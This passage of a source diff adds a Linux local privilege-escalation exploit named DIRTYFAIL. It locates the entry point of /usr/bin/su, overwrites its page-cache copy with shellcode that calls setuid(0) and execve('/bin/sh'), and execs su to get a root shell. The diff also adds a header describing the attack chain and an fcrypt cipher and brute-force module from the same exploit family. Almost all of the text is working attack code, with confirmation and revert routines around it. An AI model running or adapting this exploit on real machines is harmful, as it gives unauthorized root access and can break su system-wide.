always SHELLCODE_LEN, but explicit for forward-compat */ + unsigned char original[SHELLCODE_LEN]; +}; + +/* ---------------------------------------------------------------- * + * ELF parsing β€” find the file offset of the entry point in /usr/bin/su. + * ---------------------------------------------------------------- */ + +static bool resolve_entry_offset(const char *path, off_t *out_offset) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) { + log_bad("open %s: %s", path, strerror(errno)); + return false; + } + + Elf64_Ehdr ehdr; + if (pread(fd, &ehdr, sizeof(ehdr), 0) != sizeof(ehdr)) { + log_bad("read ELF header: %s", strerror(errno)); + close(fd); return false; + } + if (memcmp(ehdr.e_ident, ELFMAG, 4) != 0) { + log_bad("%s is not an ELF file", path); + close(fd); return false; + } + if (ehdr.e_ident[EI_CLASS] != ELFCLASS64) { + log_bad("%s is not 64-bit ELF (this exploit requires x86_64)", path); + close(fd); return false; + } + if (ehdr.e_machine != EM_X86_64) { + log_bad("%s is not x86_64 (machine=0x%x); shellcode is x86_64-only", + path, ehdr.e_machine); + close(fd); return false; + } + + /* Walk program headers to find the LOAD segment containing e_entry. */ + Elf64_Phdr phdr; + bool found = false; + for (int i = 0; i < ehdr.e_phnum; i++) { + off_t poff = ehdr.e_phoff + (off_t)i * ehdr.e_phentsize; + if (pread(fd, &phdr, sizeof(phdr), poff) != sizeof(phdr)) { + log_bad("read phdr[%d]: %s", i, strerror(errno)); + close(fd); return false; + } + if (phdr.p_type != PT_LOAD) continue; + if (!(phdr.p_flags & PF_X)) continue; /* must be executable */ + if (ehdr.e_entry < phdr.p_vaddr) continue; + if (ehdr.e_entry >= phdr.p_vaddr + phdr.p_memsz) continue; + *out_offset = phdr.p_offset + (ehdr.e_entry - phdr.p_vaddr); + found = true; + break; + } + close(fd); + + if (!found) { + log_bad("could not locate executable LOAD segment containing e_entry " + "(0x%llx) in %s", (unsigned long long)ehdr.e_entry, path); + return false; + } + + /* Sanity: ensure the 48-byte plant region fits inside the file. */ + struct stat st; + if (stat(path, &st) < 0) { log_bad("stat: %s", strerror(errno)); return false; } + if ((uint64_t)*out_offset + SHELLCODE_LEN > (uint64_t)st.st_size) { + log_bad("entry offset 0x%llx + %d would overflow %s (size 0x%llx)", + (unsigned long long)*out_offset, SHELLCODE_LEN, + path, (unsigned long long)st.st_size); + return false; + } + return true; +} + +/* ---------------------------------------------------------------- * + * Backup / revert + * ---------------------------------------------------------------- */ + +static bool save_original(const char *path, off_t off) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) { log_bad("open %s: %s", path, strerror(errno)); return false; } + + struct su_state st = {0}; + memcpy(st.magic, STATE_MAGIC, 8); + strncpy(st.target_path, path, sizeof(st.target_path) - 1); + st.file_offset = (uint64_t)off; + st.original_len = SHELLCODE_LEN; + + if (pread(fd, st.original, SHELLCODE_LEN, off) != SHELLCODE_LEN) { + log_bad("pread original 48 bytes: %s", strerror(errno)); + close(fd); return false; + } + close(fd); + + int sfd = open(STATE_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0600); + if (sfd < 0) { log_bad("open %s: %s", STATE_PATH, strerror(errno)); return false; } + if (write(sfd, &st, sizeof(st)) != sizeof(st)) { + log_bad("write state: %s", strerror(errno)); + close(sfd); unlink(STATE_PATH); return false; + } + close(sfd); + log_ok("stashed original %d bytes from %s+0x%llx β†’ %s", + SHELLCODE_LEN, path, (unsigned long long)off, STATE_PATH); + return true; +} + +/* Read state, return false if missing or malformed. */ +static bool load_state(struct su_state *out) +{ + int sfd = open(STATE_PATH, O_RDONLY); + if (sfd < 0) { + log_bad("open %s: %s", STATE_PATH, strerror(errno)); + return false; + } + if (read(sfd, out, sizeof(*out)) != sizeof(*out)) { + log_bad("read state: %s", strerror(errno)); + close(sfd); return false; + } + close(sfd); + if (memcmp(out->magic, STATE_MAGIC, 8) != 0) { + log_bad("state file magic mismatch"); + return false; + } + if (out->original_len != SHELLCODE_LEN) { + log_bad("state file original_len=%llu (expected %d)", + (unsigned long long)out->original_len, SHELLCODE_LEN); + return false; + } + return true; +} + +/* ---------------------------------------------------------------- * + * Plant + verify + * ---------------------------------------------------------------- */ + +static bool plant_shellcode(const char *path, off_t base_off, + const unsigned char *bytes, size_t len) +{ + if (len % 4 != 0) { log_bad("plant len %zu not multiple of 4", len); return false; } + + log_step("planting %zu bytes of shellcode via %zu chained 4-byte writes", + len, len / 4); + + for (size_t i = 0; i < len; i += 4) { + unsigned char chunk[4]; + memcpy(chunk, bytes + i, 4); + if (!cf_4byte_write(path, base_off + (off_t)i, chunk)) { + log_bad("cf_4byte_write[%zu] failed at offset 0x%llx", + i / 4, (unsigned long long)(base_off + i)); + return false; + } + /* Compact progress dot per chunk; no full-line spam. */ + fputc('.', stdout); fflush(stdout); + } + fputc('\n', stdout); + return true; +} + +static bool verify_plant(const char *path, off_t off, + const unsigned char *expected, size_t len) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) { log_bad("verify open: %s", strerror(errno)); return false; } + unsigned char got[SHELLCODE_LEN]; + if (pread(fd, got, len, off) != (ssize_t)len) { + log_bad("verify pread: %s", strerror(errno)); + close(fd); return false; + } + close(fd); + return memcmp(got, expected, len) == 0; +} + +/* try_revert_su_pages: best-effort revert. We don't have CAP_SYS_ADMIN + * to drop_caches in init ns from an unprivileged process, but + * POSIX_FADV_DONTNEED on a freshly-opened fd typically evicts the + * affected pages on most kernels. */ +static bool try_revert_su_pages(const char *path, off_t off, + const unsigned char *original, size_t len) +{ + if (!plant_shellcode(path, off, original, len)) { + log_warn("revert plant failed β€” page cache may still be poisoned"); + return false; + } + int fd = open(path, O_RDONLY); + if (fd >= 0) { +#ifdef POSIX_FADV_DONTNEED + posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED); +#endif + close(fd); + } + /* Verify the revert landed correctly. */ + if (!verify_plant(path, off, original, len)) { + log_warn("revert verification failed β€” bytes do not match original"); + return false; + } + return true; +} + +/* ---------------------------------------------------------------- * + * Public entry points + * ---------------------------------------------------------------- */ + +df_result_t exploit_su_shellcode(bool do_shell) +{ + log_step("Copy Fail β€” /usr/bin/su page-cache shellcode injection"); + + const char *target = getenv("DIRTYFAIL_SU_PATH"); + if (!target || !*target) target = SU_PATH; + + /* Architecture preflight. We ship two shellcodes: + * x86_64 β€” tested end-to-end on Fedora 44 (real-root proven). + * aarch64 β€” manually encoded from the ARMv8-A reference, + * never executed on hardware. Gated behind an env + * var so an aarch64 user has to opt in explicitly. + * Anything else has no shellcode and aborts here. */ + if (!SHELLCODE_PRESENT) { + log_bad("no shellcode for this architecture (built for %s); " + "DIRTYFAIL --exploit-su currently supports x86_64 and " + "aarch64 only.", SHELLCODE_ARCH); + return DF_PRECOND_FAIL; + } + if (!SHELLCODE_TESTED && !getenv("DIRTYFAIL_AARCH64_TRUST_UNTESTED")) { + log_bad("running on %s, where the shipped shellcode has NOT been " + "tested on hardware. Aborting to avoid bricking /usr/bin/su.", + SHELLCODE_ARCH); + log_hint("if you've reviewed tools/exploit_su_aarch64.S and want to " + "proceed at your own risk, set " + "DIRTYFAIL_AARCH64_TRUST_UNTESTED=1 in the environment."); + log_hint("recommended verification: assemble the .S file with " + "`aarch64-linux-gnu-as` and confirm the byte sequence " + "matches `shellcode_aarch64[]` in src/exploit_su.c."); + return DF_PRECOND_FAIL; + } + if (!SHELLCODE_TESTED) { + log_warn("DIRTYFAIL_AARCH64_TRUST_UNTESTED=1: proceeding with " + "untested aarch64 shellcode (%d bytes). If /usr/bin/su " + "breaks, run `dirtyfail --cleanup-su` (or reboot) to " + "evict the modified page from the cache.", SHELLCODE_LEN); + } + + struct stat st; + if (stat(target, &st) < 0) { + log_bad("stat %s: %s", target, strerror(errno)); + return DF_PRECOND_FAIL; + } + if (!(st.st_mode & S_ISUID) || st.st_uid != 0) { + log_bad("%s is not setuid root (mode=0%o uid=%u)", + target, st.st_mode, st.st_uid); + log_hint("the exploit relies on the setuid bit; without it, the " + "shellcode runs at our existing uid and gains nothing."); + return DF_PRECOND_FAIL; + } + + off_t entry_off; + if (!resolve_entry_offset(target, &entry_off)) return DF_TEST_ERROR; + log_ok("/usr/bin/su entry point at file offset 0x%llx", + (unsigned long long)entry_off); + + log_warn("about to overwrite %d bytes of %s in the page cache", + SHELLCODE_LEN, target); + log_warn("if this fails or the shellcode crashes, /usr/bin/su will be " + "broken system-wide until --cleanup-su or `drop_caches`"); + + /* CRITICAL: disable libc stdin buffering before the typed_confirm + * read. Otherwise fgets() pulls extra bytes from the pipe into libc's + * buffer, which is lost when execve() replaces our process β€” the + * exec'd /bin/sh then sees empty stdin and exits without running + * any commands the user piped in. With _IONBF, fgets does 1-byte + * reads and leaves the kernel pipe intact. */ + setvbuf(stdin, NULL, _IONBF, 0); + + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined"); + return DF_OK; + } + + if (!save_original(target, entry_off)) return DF_TEST_ERROR; + + if (!plant_shellcode(target, entry_off, shellcode, SHELLCODE_LEN)) { + log_warn("plant failed mid-stream β€” attempting revert"); + struct su_state st_in; + if (load_state(&st_in) && + try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) { + unlink(STATE_PATH); + } + return DF_EXPLOIT_FAIL; + } + + if (!verify_plant(target, entry_off, shellcode, SHELLCODE_LEN)) { + log_bad("verify: page cache does not match planted shellcode " + "(kernel likely patched, or AF_ALG/algif_aead blocked)"); + struct su_state st_in; + if (load_state(&st_in) && + try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) { + unlink(STATE_PATH); + } + return DF_EXPLOIT_FAIL; + } + log_ok("page cache of %s now contains shellcode at entry point", target); + + if (!do_shell) { + log_step("--no-shell: reverting via DONTNEED+rewrite"); + struct su_state st_in; + if (load_state(&st_in) && + try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) { + log_ok("page cache reverted successfully"); + unlink(STATE_PATH); + } else { + log_warn("revert may have failed β€” run `sudo dirtyfail --cleanup-su` " + "or reboot before using su again"); + } + return DF_EXPLOIT_OK; + } + + log_ok("invoking %s β€” kernel will exec setuid-root, jump to our shellcode, " + "and drop a /bin/sh root shell", target); + log_hint("when you exit the shell, run `sudo dirtyfail --cleanup-su` to " + "restore /usr/bin/su (or reboot β€” page cache is RAM-only)"); + execl(target, "su", (char *)NULL); + log_bad("execl: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* Describe state file if present, for `--list-state`. Returns true if + * an exploit-su state file was found and described, false if absent. + * Silent when file is missing (the normal case). */ +bool exploit_su_list_state(void) +{ + struct stat ignored; + if (stat(STATE_PATH, &ignored) < 0) return false; /* clean state */ + struct su_state st_in; + if (!load_state(&st_in)) return false; + log_warn("/usr/bin/su shellcode planted β€” state file %s", STATE_PATH); + log_hint(" target: %s, entry-point file offset: 0x%llx", + st_in.target_path, (unsigned long long)st_in.file_offset); + log_hint(" original %llu bytes stashed.", + (unsigned long long)st_in.original_len); + log_hint(" the page cache currently has x86_64 setuid+execve(/bin/sh)"); + log_hint(" shellcode in place of the above. Revert with `--cleanup-su`."); + return true; +} + +df_result_t cleanup_su_shellcode(void) +{ + log_step("--cleanup-su: restore /usr/bin/su entry-point bytes from %s", + STATE_PATH); + + struct su_state st_in; + if (!load_state(&st_in)) return DF_TEST_ERROR; + + log_hint("target: %s, file_offset: 0x%llx", st_in.target_path, + (unsigned long long)st_in.file_offset); + + if (!try_revert_su_pages(st_in.target_path, (off_t)st_in.file_offset, + st_in.original, SHELLCODE_LEN)) { + log_bad("revert failed β€” manual fix needed: " + "`echo 3 | sudo tee /proc/sys/vm/drop_caches`"); + return DF_TEST_ERROR; + } + + if (unlink(STATE_PATH) == 0) { + log_ok("page cache restored and state file removed"); + } else { + log_warn("page cache restored but %s could not be removed: %s", + STATE_PATH, strerror(errno)); + } + return DF_OK; +} + +#else /* !__linux__ */ + +df_result_t exploit_su_shellcode(bool do_shell) +{ + (void)do_shell; + return DF_TEST_ERROR; +} + +df_result_t cleanup_su_shellcode(void) +{ + return DF_TEST_ERROR; +} + +bool exploit_su_list_state(void) +{ + return false; +} + +#endif diff --git a/modules/copy_fail_family/exploit_su.h b/modules/copy_fail_family/exploit_su.h new file mode 100644 index 0000000..c3650c5 --- /dev/null +++ b/modules/copy_fail_family/exploit_su.h @@ -0,0 +1,56 @@ +/* + * DIRTYFAIL β€” exploit_su.h + * + * V4bel-style page-cache shellcode injection against /usr/bin/su. + * + * Different chain than the /etc/passwd UID-flip exploits: + * - Targets /usr/bin/su's ELF entry point in the page cache + * - Plants ~48 bytes of x86_64 shellcode (setuid(0); setgid(0); + * execve("/bin/sh")) via 12 chained 4-byte writes + * - When /usr/bin/su is exec'd, kernel sets euid=0 (setuid bit on + * disk, unaffected by page-cache mods), dynamic linker resolves, + * control transfers to entry point β†’ our shellcode β†’ /bin/sh + * + * Mitigation profile vs. /etc/passwd flip: + * + Bypasses `pam_unix nullok` removal β€” no PAM dependency at all + * + Works even if password rotation policy enforces complex passwords + * - Crashes /usr/bin/su system-wide if shellcode is wrong (until + * drop_caches or reboot) + * - Stash-and-revert is the safety net: cleanup-su restores the + * original 48 bytes from /var/tmp/.dirtyfail-su.state. + * + * Architecture: x86_64 only for now. The shellcode is hardcoded for + * the SYSV amd64 syscall ABI. arm64/aarch64 would need a different + * shellcode blob and possibly a different entry-point fixup. + * + * Reference: V4bel/dirtyfrag's xfrm-ESP variant uses the same target + * file pattern with a different (4-byte) primitive. Theori's Xint + * disclosure uses /usr/bin/su as the canonical target. + */ + +#ifndef DIRTYFAIL_EXPLOIT_SU_H +#define DIRTYFAIL_EXPLOIT_SU_H + +#include "common.h" + +/* End-to-end PoC: locate /usr/bin/su (or DIRTYFAIL_SU_PATH override), + * stash original entry-point bytes, plant shellcode, verify, and + * (if do_shell) invoke `su -` so the kernel exec's our hijacked + * /usr/bin/su as setuid root β†’ shellcode runs β†’ /bin/sh. + * + * `do_shell=false` runs the plant + verify + revert sequence β€” useful + * for testing the primitive without leaving the system in a broken + * state (su would otherwise be unusable until drop_caches). */ +df_result_t exploit_su_shellcode(bool do_shell); + +/* Restore /usr/bin/su's original entry-point bytes from + * /var/tmp/.dirtyfail-su.state and drop_caches to evict the modified + * page. Returns DF_OK on success, DF_TEST_ERROR if state file is + * missing or the on-disk file no longer matches. */ +df_result_t cleanup_su_shellcode(void); + +/* Used by --list-state. Returns true if /var/tmp/.dirtyfail-su.state + * is present (and prints a summary), false if absent. Side-effect free. */ +bool exploit_su_list_state(void); + +#endif diff --git a/modules/copy_fail_family/fcrypt.c b/modules/copy_fail_family/fcrypt.c new file mode 100644 index 0000000..973ef18 --- /dev/null +++ b/modules/copy_fail_family/fcrypt.c @@ -0,0 +1,303 @@ +/* + * DIRTYFAIL β€” fcrypt.c + * + * Implementation of the rxkad fcrypt block cipher and a user-space + * brute-force search loop. + * + * ATTRIBUTION + * ----------- + * The four 256-byte S-box tables (`SBOX0_RAW` … `SBOX3_RAW`) and the + * 8-byte β†’ 56-bit key packing + 11-bit rotation key schedule are the + * standard rxkad / fcrypt protocol constants, also present in the + * Linux kernel `crypto/fcrypt.c` (GPL-2.0, David Howells / KTH). + * + * The implementation code below β€” table preprocessing, round-key + * struct, brute-force harness, predicates β€” is fresh DIRTYFAIL code. + * The cipher tables themselves are protocol facts; using them is what + * makes interoperability with the kernel possible. + * + * See NOTICE.md. + * + * SELF-TEST VECTORS (from the kernel test suite): + * K = 00 00 00 00 00 00 00 00 β†’ decrypt(0E0900C73EF7ED41) = 00000000 00000000 + * K = 11 44 ?? ?? ?? ?? ?? 66 β†’ decrypt(D8ED787477EC0680) = 12345678 9ABCDEF0 + */ + +#include "fcrypt.h" + +#include /* htonl == htonl, portable */ +#include +#include + +/* -------- raw S-box bytes ------------------------------------------------ * + * + * These are the rxkad protocol S-boxes, exactly as specified. + * They are pre-shifted into 32-bit form by fcrypt_init() so the inner + * round function (FF) is just four XORs of 32-bit lookups. + */ + +static const uint8_t SBOX0_RAW[256] = { + 0xea,0x7f,0xb2,0x64,0x9d,0xb0,0xd9,0x11,0xcd,0x86,0x86,0x91,0x0a,0xb2,0x93,0x06, + 0x0e,0x06,0xd2,0x65,0x73,0xc5,0x28,0x60,0xf2,0x20,0xb5,0x38,0x7e,0xda,0x9f,0xe3, + 0xd2,0xcf,0xc4,0x3c,0x61,0xff,0x4a,0x4a,0x35,0xac,0xaa,0x5f,0x2b,0xbb,0xbc,0x53, + 0x4e,0x9d,0x78,0xa3,0xdc,0x09,0x32,0x10,0xc6,0x6f,0x66,0xd6,0xab,0xa9,0xaf,0xfd, + 0x3b,0x95,0xe8,0x34,0x9a,0x81,0x72,0x80,0x9c,0xf3,0xec,0xda,0x9f,0x26,0x76,0x15, + 0x3e,0x55,0x4d,0xde,0x84,0xee,0xad,0xc7,0xf1,0x6b,0x3d,0xd3,0x04,0x49,0xaa,0x24, + 0x0b,0x8a,0x83,0xba,0xfa,0x85,0xa0,0xa8,0xb1,0xd4,0x01,0xd8,0x70,0x64,0xf0,0x51, + 0xd2,0xc3,0xa7,0x75,0x8c,0xa5,0x64,0xef,0x10,0x4e,0xb7,0xc6,0x61,0x03,0xeb,0x44, + 0x3d,0xe5,0xb3,0x5b,0xae,0xd5,0xad,0x1d,0xfa,0x5a,0x1e,0x33,0xab,0x93,0xa2,0xb7, + 0xe7,0xa8,0x45,0xa4,0xcd,0x29,0x63,0x44,0xb6,0x69,0x7e,0x2e,0x62,0x03,0xc8,0xe0, + 0x17,0xbb,0xc7,0xf3,0x3f,0x36,0xba,0x71,0x8e,0x97,0x65,0x60,0x69,0xb6,0xf6,0xe6, + 0x6e,0xe0,0x81,0x59,0xe8,0xaf,0xdd,0x95,0x22,0x99,0xfd,0x63,0x19,0x74,0x61,0xb1, + 0xb6,0x5b,0xae,0x54,0xb3,0x70,0xff,0xc6,0x3b,0x3e,0xc1,0xd7,0xe1,0x0e,0x76,0xe5, + 0x36,0x4f,0x59,0xc7,0x08,0x6e,0x82,0xa6,0x93,0xc4,0xaa,0x26,0x49,0xe0,0x21,0x64, + 0x07,0x9f,0x64,0x81,0x9c,0xbf,0xf9,0xd1,0x43,0xf8,0xb6,0xb9,0xf1,0x24,0x75,0x03, + 0xe4,0xb0,0x99,0x46,0x3d,0xf5,0xd1,0x39,0x72,0x12,0xf6,0xba,0x0c,0x0d,0x42,0x2e, +}; + +static const uint8_t SBOX1_RAW[256] = { + 0x77,0x14,0xa6,0xfe,0xb2,0x5e,0x8c,0x3e,0x67,0x6c,0xa1,0x0d,0xc2,0xa2,0xc1,0x85, + 0x6c,0x7b,0x67,0xc6,0x23,0xe3,0xf2,0x89,0x50,0x9c,0x03,0xb7,0x73,0xe6,0xe1,0x39, + 0x31,0x2c,0x27,0x9f,0xa5,0x69,0x44,0xd6,0x23,0x83,0x98,0x7d,0x3c,0xb4,0x2d,0x99, + 0x1c,0x1f,0x8c,0x20,0x03,0x7c,0x5f,0xad,0xf4,0xfa,0x95,0xca,0x76,0x44,0xcd,0xb6, + 0xb8,0xa1,0xa1,0xbe,0x9e,0x54,0x8f,0x0b,0x16,0x74,0x31,0x8a,0x23,0x17,0x04,0xfa, + 0x79,0x84,0xb1,0xf5,0x13,0xab,0xb5,0x2e,0xaa,0x0c,0x60,0x6b,0x5b,0xc4,0x4b,0xbc, + 0xe2,0xaf,0x45,0x73,0xfa,0xc9,0x49,0xcd,0x00,0x92,0x7d,0x97,0x7a,0x18,0x60,0x3d, + 0xcf,0x5b,0xde,0xc6,0xe2,0xe6,0xbb,0x8b,0x06,0xda,0x08,0x15,0x1b,0x88,0x6a,0x17, + 0x89,0xd0,0xa9,0xc1,0xc9,0x70,0x6b,0xe5,0x43,0xf4,0x68,0xc8,0xd3,0x84,0x28,0x0a, + 0x52,0x66,0xa3,0xca,0xf2,0xe3,0x7f,0x7a,0x31,0xf7,0x88,0x94,0x5e,0x9c,0x63,0xd5, + 0x24,0x66,0xfc,0xb3,0x57,0x25,0xbe,0x89,0x44,0xc4,0xe0,0x8f,0x23,0x3c,0x12,0x52, + 0xf5,0x1e,0xf4,0xcb,0x18,0x33,0x1f,0xf8,0x69,0x10,0x9d,0xd3,0xf7,0x28,0xf8,0x30, + 0x05,0x5e,0x32,0xc0,0xd5,0x19,0xbd,0x45,0x8b,0x5b,0xfd,0xbc,0xe2,0x5c,0xa9,0x96, + 0xef,0x70,0xcf,0xc2,0x2a,0xb3,0x61,0xad,0x80,0x48,0x81,0xb7,0x1d,0x43,0xd9,0xd7, + 0x45,0xf0,0xd8,0x8a,0x59,0x7c,0x57,0xc1,0x79,0xc7,0x34,0xd6,0x43,0xdf,0xe4,0x78, + 0x16,0x06,0xda,0x92,0x76,0x51,0xe1,0xd4,0x70,0x03,0xe0,0x2f,0x96,0x91,0x82,0x80, +}; + +static const uint8_t SBOX2_RAW[256] = { + 0xf0,0x37,0x24,0x53,0x2a,0x03,0x83,0x86,0xd1,0xec,0x50,0xf0,0x42,0x78,0x2f,0x6d, + 0xbf,0x80,0x87,0x27,0x95,0xe2,0xc5,0x5d,0xf9,0x6f,0xdb,0xb4,0x65,0x6e,0xe7,0x24, + 0xc8,0x1a,0xbb,0x49,0xb5,0x0a,0x7d,0xb9,0xe8,0xdc,0xb7,0xd9,0x45,0x20,0x1b,0xce, + 0x59,0x9d,0x6b,0xbd,0x0e,0x8f,0xa3,0xa9,0xbc,0x74,0xa6,0xf6,0x7f,0x5f,0xb1,0x68, + 0x84,0xbc,0xa9,0xfd,0x55,0x50,0xe9,0xb6,0x13,0x5e,0x07,0xb8,0x95,0x02,0xc0,0xd0, + 0x6a,0x1a,0x85,0xbd,0xb6,0xfd,0xfe,0x17,0x3f,0x09,0xa3,0x8d,0xfb,0xed,0xda,0x1d, + 0x6d,0x1c,0x6c,0x01,0x5a,0xe5,0x71,0x3e,0x8b,0x6b,0xbe,0x29,0xeb,0x12,0x19,0x34, + 0xcd,0xb3,0xbd,0x35,0xea,0x4b,0xd5,0xae,0x2a,0x79,0x5a,0xa5,0x32,0x12,0x7b,0xdc, + 0x2c,0xd0,0x22,0x4b,0xb1,0x85,0x59,0x80,0xc0,0x30,0x9f,0x73,0xd3,0x14,0x48,0x40, + 0x07,0x2d,0x8f,0x80,0x0f,0xce,0x0b,0x5e,0xb7,0x5e,0xac,0x24,0x94,0x4a,0x18,0x15, + 0x05,0xe8,0x02,0x77,0xa9,0xc7,0x40,0x45,0x89,0xd1,0xea,0xde,0x0c,0x79,0x2a,0x99, + 0x6c,0x3e,0x95,0xdd,0x8c,0x7d,0xad,0x6f,0xdc,0xff,0xfd,0x62,0x47,0xb3,0x21,0x8a, + 0xec,0x8e,0x19,0x18,0xb4,0x6e,0x3d,0xfd,0x74,0x54,0x1e,0x04,0x85,0xd8,0xbc,0x1f, + 0x56,0xe7,0x3a,0x56,0x67,0xd6,0xc8,0xa5,0xf3,0x8e,0xde,0xae,0x37,0x49,0xb7,0xfa, + 0xc8,0xf4,0x1f,0xe0,0x2a,0x9b,0x15,0xd1,0x34,0x0e,0xb5,0xe0,0x44,0x78,0x84,0x59, + 0x56,0x68,0x77,0xa5,0x14,0x06,0xf5,0x2f,0x8c,0x8a,0x73,0x80,0x76,0xb4,0x10,0x86, +}; + +static const uint8_t SBOX3_RAW[256] = { + 0xa9,0x2a,0x48,0x51,0x84,0x7e,0x49,0xe2,0xb5,0xb7,0x42,0x33,0x7d,0x5d,0xa6,0x12, + 0x44,0x48,0x6d,0x28,0xaa,0x20,0x6d,0x57,0xd6,0x6b,0x5d,0x72,0xf0,0x92,0x5a,0x1b, + 0x53,0x80,0x24,0x70,0x9a,0xcc,0xa7,0x66,0xa1,0x01,0xa5,0x41,0x97,0x41,0x31,0x82, + 0xf1,0x14,0xcf,0x53,0x0d,0xa0,0x10,0xcc,0x2a,0x7d,0xd2,0xbf,0x4b,0x1a,0xdb,0x16, + 0x47,0xf6,0x51,0x36,0xed,0xf3,0xb9,0x1a,0xa7,0xdf,0x29,0x43,0x01,0x54,0x70,0xa4, + 0xbf,0xd4,0x0b,0x53,0x44,0x60,0x9e,0x23,0xa1,0x18,0x68,0x4f,0xf0,0x2f,0x82,0xc2, + 0x2a,0x41,0xb2,0x42,0x0c,0xed,0x0c,0x1d,0x13,0x3a,0x3c,0x6e,0x35,0xdc,0x60,0x65, + 0x85,0xe9,0x64,0x02,0x9a,0x3f,0x9f,0x87,0x96,0xdf,0xbe,0xf2,0xcb,0xe5,0x6c,0xd4, + 0x5a,0x83,0xbf,0x92,0x1b,0x94,0x00,0x42,0xcf,0x4b,0x00,0x75,0xba,0x8f,0x76,0x5f, + 0x5d,0x3a,0x4d,0x09,0x12,0x08,0x38,0x95,0x17,0xe4,0x01,0x1d,0x4c,0xa9,0xcc,0x85, + 0x82,0x4c,0x9d,0x2f,0x3b,0x66,0xa1,0x34,0x10,0xcd,0x59,0x89,0xa5,0x31,0xcf,0x05, + 0xc8,0x84,0xfa,0xc7,0xba,0x4e,0x8b,0x1a,0x19,0xf1,0xa1,0x3b,0x18,0x12,0x17,0xb0, + 0x98,0x8d,0x0b,0x23,0xc3,0x3a,0x2d,0x20,0xdf,0x13,0xa0,0xa8,0x4c,0x0d,0x6c,0x2f, + 0x47,0x13,0x13,0x52,0x1f,0x2d,0xf5,0x79,0x3d,0xa2,0x54,0xbd,0x69,0xc8,0x6b,0xf3, + 0x05,0x28,0xf1,0x16,0x46,0x40,0xb0,0x11,0xd3,0xb7,0x95,0x49,0xcf,0xc3,0x1d,0x8f, + 0xd8,0xe1,0x73,0xdb,0xad,0xc8,0xc9,0xa9,0xa1,0xc2,0xc5,0xe3,0xba,0xfc,0x0e,0x25, +}; + +/* -------- preprocessed 32-bit S-boxes ----------------------------------- * + * + * The round function does ROUND_KEY ^ HALF_BLOCK then four S-box lookups + * combined by XOR. To make this fast we pre-rotate the S-box outputs + * into the four byte lanes: + * + * sbox0[b] = b (low byte lane) + * sbox1[b] = (b & 0x1f) << 5 in the LOW byte, b >> 5 in the SECOND byte + * (rotation by 8-3=5 bits within a 32-bit big-endian view) + * sbox2[b] = b << 11 + * sbox3[b] = b << 19 + * + * After all four are XORed, we get the round-function output directly + * in big-endian order, ready to XOR into the other half-block. + */ + +static uint32_t SBOX0[256], SBOX1[256], SBOX2[256], SBOX3[256]; + +void fcrypt_init(void) +{ + for (int i = 0; i < 256; i++) { + SBOX0[i] = htonl((uint32_t)SBOX0_RAW[i] << 3); + SBOX1[i] = htonl(((uint32_t)(SBOX1_RAW[i] & 0x1f) << 27) | + ((uint32_t)SBOX1_RAW[i] >> 5)); + SBOX2[i] = htonl((uint32_t)SBOX2_RAW[i] << 11); + SBOX3[i] = htonl((uint32_t)SBOX3_RAW[i] << 19); + } +} + +/* -------- key schedule -------------------------------------------------- * + * + * The key is 8 bytes but only the high 7 bits of each byte are used β€” + * this is the standard 56-bit key with the low bit of each byte serving + * as parity in the AFS rxkad token format. We pack: + * + * k_56 = (key[0]>>1) || (key[1]>>1) || ... || (key[7]>>1) (56 bits) + * + * Then derive 16 round keys by emitting the low 32 bits of k_56 and + * rotating right by 11 bits between each: + * + * round_key[0] = k_56[0..31] + * k_56 = ROR_56(k_56, 11) + * round_key[1] = k_56[0..31] + * ... + * round_key[15] = k_56[0..31] (no rotation after the last) + */ + +#define ROR56_11(k) \ + ((k) = ((k) >> 11) | (((k) & ((1ULL << 11) - 1)) << (56 - 11))) + +void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8]) +{ + uint64_t k = 0; + for (int i = 0; i < 8; i++) { + k = (k << 7) | (uint64_t)(key[i] >> 1); + } + /* k is now 56 bits in the low order of a uint64_t. */ + for (int i = 0; i < 16; i++) { + ctx->round_key[i] = htonl((uint32_t)k); + if (i < 15) ROR56_11(k); + } +} + +/* -------- decrypt ------------------------------------------------------- * + * + * Standard 16-round Feistel decrypt with reversed round-key order. + * The round function FF mixes the round key into one half-block, splits + * into 4 bytes, and XORs the four S-box outputs into the other half. + */ + +#define FF(R_, L_, k_) do { \ + union { uint32_t w; uint8_t b[4]; } u; \ + u.w = (k_) ^ (R_); \ + (L_) ^= SBOX0[u.b[0]] ^ SBOX1[u.b[1]] ^ SBOX2[u.b[2]] ^ SBOX3[u.b[3]]; \ +} while (0) + +void fcrypt_decrypt(const fcrypt_ctx *ctx, + uint8_t out[8], const uint8_t in[8]) +{ + uint32_t L, R; + memcpy(&L, in, 4); + memcpy(&R, in + 4, 4); + + FF(L, R, ctx->round_key[0xf]); + FF(R, L, ctx->round_key[0xe]); + FF(L, R, ctx->round_key[0xd]); + FF(R, L, ctx->round_key[0xc]); + FF(L, R, ctx->round_key[0xb]); + FF(R, L, ctx->round_key[0xa]); + FF(L, R, ctx->round_key[0x9]); + FF(R, L, ctx->round_key[0x8]); + FF(L, R, ctx->round_key[0x7]); + FF(R, L, ctx->round_key[0x6]); + FF(L, R, ctx->round_key[0x5]); + FF(R, L, ctx->round_key[0x4]); + FF(L, R, ctx->round_key[0x3]); + FF(R, L, ctx->round_key[0x2]); + FF(L, R, ctx->round_key[0x1]); + FF(R, L, ctx->round_key[0x0]); + + memcpy(out, &L, 4); + memcpy(out + 4, &R, 4); +} + +/* -------- self-test ----------------------------------------------------- */ + +bool fcrypt_selftest(void) +{ + fcrypt_ctx ctx; + uint8_t out[8]; + + /* Vector 1: all-zero key. Catches gross structural bugs but the + * key schedule produces all-zero round keys, so it can't catch + * subtle bugs in the 7-bit packing or 11-bit rotation. */ + static const uint8_t k1[8] = {0,0,0,0,0,0,0,0}; + static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41}; + fcrypt_setkey(&ctx, k1); + fcrypt_decrypt(&ctx, out, c1); + if (memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) != 